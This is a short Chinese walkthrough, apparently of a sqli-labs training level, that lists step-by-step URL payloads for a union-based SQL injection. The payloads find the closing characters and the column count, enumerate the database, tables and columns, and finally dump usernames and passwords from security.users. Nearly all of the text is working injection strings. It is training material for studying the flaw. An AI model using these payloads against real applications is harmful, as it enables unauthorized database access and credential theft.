0、初始页面
1、确定闭合符号
前两条判断是否为数值型注入,后两条判断字符型注入的闭合符号
?id=1 and 1=1
?id=1 and 1=2
?id=1"
?id=1")
2、确定表的列数
?id=1") order by 3 --+
3、确定回显位置
?id=-1") union select 1,2,3 --+
4、爆库名
?id=-1") union select 1,user(),database() --+
5、爆表名
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
6、爆列名
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema='security' --+
7、显示最终目标
?id=-1") union select 1,2,group_concat(username,0x3a,password) from security.users --+
扫一扫
213
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
